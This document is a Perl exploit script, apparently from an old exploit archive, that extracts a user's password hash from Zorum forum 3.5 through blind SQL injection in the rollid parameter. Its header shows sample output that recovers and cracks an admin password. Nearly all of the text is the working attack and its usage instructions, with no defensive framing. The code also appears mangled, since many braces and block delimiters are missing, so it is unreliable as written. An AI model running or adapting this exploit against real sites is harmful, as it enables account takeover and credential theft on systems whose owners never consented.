use LWP::UserAgent;
# -------------------------------------------------------------------------------------------
# Zorum forum (http://zorum.phpoutsourcing.com/) version 3.5 sql injection exploit
# by 1dt.w0lf // RusH security team
# *** work on all mysql versions
# -------------------------------------------------------------------------------------------
# Usage: r57zor.pl [path] [rollid] [username]
# [path] - path to forum
# [rollid] - forum number where user create topic
# [username] - username for bruteforce
# -------------------------------------------------------------------------------------------
# screen:
# r57zor.pl http://zorum.phpoutsourcing.com/forum/ 4 admin
# Please wait...
# [################]
# USER_NAME: admin
# USER_PASS: 32b3956b2024e0fc
# -------------------------------------------------------------------------------------------
# well it's just default sql crypting...
# mysql_crk.exe 32b3956b2024e0fc
# Hash: 32b3956b2024e0fc
# Trying length 3
# Trying length 4
# Trying length 5
# Trying length 6
# Found pass: habzsi
# jabi-dabi-duuuu ... we are admins now... =)
# -------------------------------------------------------------------------------------------
# greets 2: GHC.ru , gst.void.ru
# -------------------------------------------------------------------------------------------
# 01.03.05
$path = $ARGV[0];
$rollid = $ARGV[1];
$username = $ARGV[2];
$s_num = 1;
if (@ARGV < 2) { &usage; }
print " Please wait...\r\n";
print " [";
### quotes must die =)
($uusername = $username) =~ s/(.)/sprintf("%d,",ord($1))/eg;
$uusername =~ s/(.*),$/$1/;
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
print qq{]
USER_NAME: $username
USER_PASS: $allchar
print "#";
$allchar .= chr($char);
sub found($$)
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
sub crack($$)
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i = 0;
return $i;
sub check($)
$ccheck = $_[0];
$http_query = $path."index.php?method=showhtmllist&list=topic&rollid=".$rollid." AND u.name=char(".$uusername.") AND ascii(substring(u.password,".$s_num.",1))".$ccheck." /*";
$mcb_reguest = LWP::UserAgent->new() or die;
$res = $mcb_reguest->post($http_query);
@results = $res->content;
#print " HTTP QUERY : $http_query \r\n";
foreach $result(@results)
if ($result =~ /details/) { return 1; }
return 0;
sub usage()
print q(
+-------------* Zorum sql injection exploit *--------------+
| r57 private stuff !!! |
| http://rst.void.ru |
|---* USAGE *----------------------------------------------|
| r57zor.pl [path] [rollid] [username] |
+--------------* view sources for more info *--------------+
# milw0rm.com [2006-02-17]